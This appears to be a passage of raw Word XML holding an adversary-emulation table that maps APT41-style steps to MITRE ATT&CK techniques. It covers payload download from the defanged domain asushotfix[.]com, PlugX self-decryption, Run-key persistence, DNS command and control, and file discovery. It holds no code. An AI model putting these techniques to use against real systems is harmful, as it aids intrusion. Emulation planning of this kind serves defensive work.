                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12202932" w14:textId="03789502" w:rsidR="00497095" w:rsidRPr="00D81EFA" w:rsidRDefault="00497095" w:rsidP="00497095">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76D919B5" w14:textId="2E853DA9" w:rsidR="00497095" w:rsidRDefault="00497095" w:rsidP="00497095">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01BC3DF4" w14:textId="77777777" w:rsidR="00497095" w:rsidRPr="00B857D7" w:rsidRDefault="00497095" w:rsidP="00497095">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DA15D3C" w14:textId="489B0CA1" w:rsidR="00497095" w:rsidRDefault="00497095" w:rsidP="00497095">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="228284FE" w14:textId="7F405FC4" w:rsidR="00497095" w:rsidRDefault="00497095" w:rsidP="00497095">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DAD655D" w14:textId="77777777" w:rsidR="00497095" w:rsidRDefault="00497095" w:rsidP="00497095">
            <w:r>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
            <w:r w:rsidRPr="00497095">
              <w:t xml:space="preserve">Upon successful validation of the MAC’s MD5 addresses, the shellcode downloads the next payload from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00497095">
              <w:t>asushotfix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00497095">
              <w:t>[.]com (if matched, of course).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0434C59D" w14:textId="74F0CCA5" w:rsidR="00B247F6" w:rsidRDefault="00B247F6" w:rsidP="00083AA6">
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00083AA6">
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidR="00083AA6">
              <w:t xml:space="preserve">[8] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00083AA6">
              <w:t>PlugX</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00083AA6">
              <w:t xml:space="preserve"> RAT is noted as being used by APT41 so used as example here</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E0D68" w:rsidRPr="00B04459" w14:paraId="06E8D701" w14:textId="77777777" w:rsidTr="009D75D8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75DC4D20" w14:textId="12F8B506" w:rsidR="009E0D68" w:rsidRPr="00B04459" w:rsidRDefault="009E0D68" w:rsidP="009D75D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F87C5CE" w14:textId="77777777" w:rsidR="009E0D68" w:rsidRPr="00B04459" w:rsidRDefault="009E0D68" w:rsidP="009D75D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36BC2902" w14:textId="77777777" w:rsidR="009E0D68" w:rsidRPr="00B04459" w:rsidRDefault="009E0D68" w:rsidP="009D75D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B7DFBE7" w14:textId="01B97073" w:rsidR="009E0D68" w:rsidRPr="00B04459" w:rsidRDefault="009E0D68" w:rsidP="009D75D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B35C660" w14:textId="77777777" w:rsidR="009E0D68" w:rsidRPr="00B04459" w:rsidRDefault="009E0D68" w:rsidP="009D75D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39083BA6" w14:textId="77777777" w:rsidR="009E0D68" w:rsidRPr="00B04459" w:rsidRDefault="009E0D68" w:rsidP="009D75D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BE522EE" w14:textId="77777777" w:rsidR="009E0D68" w:rsidRPr="00B04459" w:rsidRDefault="009E0D68" w:rsidP="009D75D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7079ACD8" w14:textId="20160F2B" w:rsidR="009E0D68" w:rsidRPr="00B04459" w:rsidRDefault="009E0D68" w:rsidP="009D75D8">
            <w:r w:rsidRPr="00B04459">
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidRPr="00B04459">
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009E0D68">
              <w:t>PlugX</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009E0D68">
              <w:t xml:space="preserve"> decompresses and decrypts itself using the Microsoft API call </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009E0D68">
              <w:t>RtlDecompressBuffer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009E0D68">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E0D68" w:rsidRPr="00B857D7" w14:paraId="30DC7D40" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D167656" w14:textId="595CA16F" w:rsidR="009E0D68" w:rsidRDefault="00127308" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31C66FED" w14:textId="385C6534" w:rsidR="009E0D68" w:rsidRPr="00B857D7" w:rsidRDefault="00127308" w:rsidP="00E20C3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2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24C0A7CA" w14:textId="540387FE" w:rsidR="009E0D68" w:rsidRPr="00D81EFA" w:rsidRDefault="00127308" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.001 </w:t>
            </w:r>
            <w:r w:rsidRPr="00127308">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Boot or Logon </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00127308">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00127308">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution: Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DF1ACAA" w14:textId="4BA3423F" w:rsidR="009E0D68" w:rsidRDefault="00127308" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B79C167" w14:textId="77777777" w:rsidR="009E0D68" w:rsidRPr="00B857D7" w:rsidRDefault="009E0D68" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58FD3AC3" w14:textId="51315A3B" w:rsidR="009E0D68" w:rsidRDefault="00127308" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05C41EBA" w14:textId="670AFCE7" w:rsidR="009E0D68" w:rsidRDefault="00127308" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF</w:t>
            </w:r>
            <w:r w:rsidR="006B5194">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FDB7320" w14:textId="2C67BE1E" w:rsidR="009E0D68" w:rsidRDefault="00127308" w:rsidP="00E20C37">
            <w:r>
              <w:t xml:space="preserve">[9] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00127308">
              <w:t>PlugX</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00127308">
              <w:t xml:space="preserve"> adds Run key entries in the Registry to establish persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B5C71" w:rsidRPr="00B857D7" w14:paraId="179F65D3" w14:textId="77777777" w:rsidTr="009C377E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="233478C3" w14:textId="77777777" w:rsidR="002B5C71" w:rsidRDefault="002B5C71" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F098777" w14:textId="23A453F0" w:rsidR="002B5C71" w:rsidRPr="00B857D7" w:rsidRDefault="002B5C71" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B9EA3AB" w14:textId="00FD1A4B" w:rsidR="002B5C71" w:rsidRPr="00D81EFA" w:rsidRDefault="002B5C71" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002B5C71">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.004 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002B5C71">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FF99CE1" w14:textId="71AC5DC9" w:rsidR="002B5C71" w:rsidRDefault="002B5C71" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="160441B4" w14:textId="77777777" w:rsidR="002B5C71" w:rsidRPr="00B857D7" w:rsidRDefault="002B5C71" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C594153" w14:textId="7C96E2D3" w:rsidR="002B5C71" w:rsidRDefault="002B5C71" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="472BEA10" w14:textId="1298E8C0" w:rsidR="002B5C71" w:rsidRDefault="002B5C71" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ABF4AA4" w14:textId="34B889D3" w:rsidR="002B5C71" w:rsidRDefault="002B5C71" w:rsidP="009C377E">
            <w:r>
              <w:t xml:space="preserve">[9] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002B5C71">
              <w:t>PlugX</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002B5C71">
              <w:t xml:space="preserve"> can be configured to use DNS for command and control</w:t>
            </w:r>
            <w:r>
              <w:t>. Prepare to run next command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC7AD0" w:rsidRPr="00B857D7" w14:paraId="010634B2" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D846AAF" w14:textId="6C34270C" w:rsidR="00EC7AD0" w:rsidRDefault="002B5C71" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BFD98EF" w14:textId="02080BED" w:rsidR="00EC7AD0" w:rsidRPr="00B857D7" w:rsidRDefault="002B5C71" w:rsidP="00E20C3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0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AE0EF1B" w14:textId="1FECCE71" w:rsidR="00EC7AD0" w:rsidRPr="00D81EFA" w:rsidRDefault="002B5C71" w:rsidP="00E20C37">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1083 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> File and Directory Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72418FF5" w14:textId="2F5D2E83" w:rsidR="00EC7AD0" w:rsidRDefault="002B5C71" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="583CB033" w14:textId="77777777" w:rsidR="00EC7AD0" w:rsidRPr="00B857D7" w:rsidRDefault="00EC7AD0" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B407AA8" w14:textId="24CE182E" w:rsidR="00EC7AD0" w:rsidRDefault="002B5C71" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
